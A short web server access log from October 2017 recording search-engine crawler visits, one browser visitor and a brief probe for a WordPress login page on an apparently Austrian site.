66.249.66.79 - - [17/Oct/2017:04:53:10 +0200] "GET /brigittenau/10281231?FS=BL1796 HTTP/1.1" 410 3425 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.76 - - [17/Oct/2017:04:54:03 +0200] "GET /uploads/pdfs/langenlois/10279524_B-L.pdf HTTP/1.1" 301 322 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:54:04 +0200] "GET /uploads/pdfs/langenlois/10279524_B-L.pdf HTTP/1.1" 200 30413 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.55 - - [17/Oct/2017:04:54:49 +0200] "GET /innsbruck/Inhaberdaten HTTP/1.1" 200 3754 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.55 - - [17/Oct/2017:04:54:49 +0200] "GET /oberwart HTTP/1.1" 200 3647 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.76.74 - - [17/Oct/2017:04:54:57 +0200] "GET /uploads/pdfs/retz/10259480_F.pdf HTTP/1.1" 301 316 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.80 - - [17/Oct/2017:04:54:58 +0200] "GET /uploads/pdfs/retz/10259480_F.pdf HTTP/1.1" 200 28348 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.196.233.72 - - [17/Oct/2017:04:55:19 +0200] "GET /horn HTTP/1.1" 200 3450 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
66.249.76.76 - - [17/Oct/2017:04:55:51 +0200] "GET /amstetten/abendkursaug?FS=B HTTP/1.1" 301 313 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.80 - - [17/Oct/2017:04:55:51 +0200] "GET /amstetten/abendkursaug?FS=B HTTP/1.1" 410 3431 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.249 - - [17/Oct/2017:04:56:16 +0200] "GET /brigittenau/Inhaberdaten HTTP/1.1" 301 411 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
24.6.162.235 - - [17/Oct/2017:04:56:27 +0200] "GET /wp-login.php HTTP/1.1" 301 399 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
24.6.162.235 - - [17/Oct/2017:04:56:28 +0200] "GET /wp-login.php HTTP/1.1" 404 8398 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
24.6.162.235 - - [17/Oct/2017:04:56:30 +0200] "GET / HTTP/1.1" 301 387 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
24.6.162.235 - - [17/Oct/2017:04:56:30 +0200] "GET / HTTP/1.1" 200 16051 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
216.244.66.202 - - [17/Oct/2017:04:56:42 +0200] "GET /robots.txt HTTP/1.1" 301 397 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.202 - - [17/Oct/2017:04:56:44 +0200] "GET /robots.txt HTTP/1.1" 200 178 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
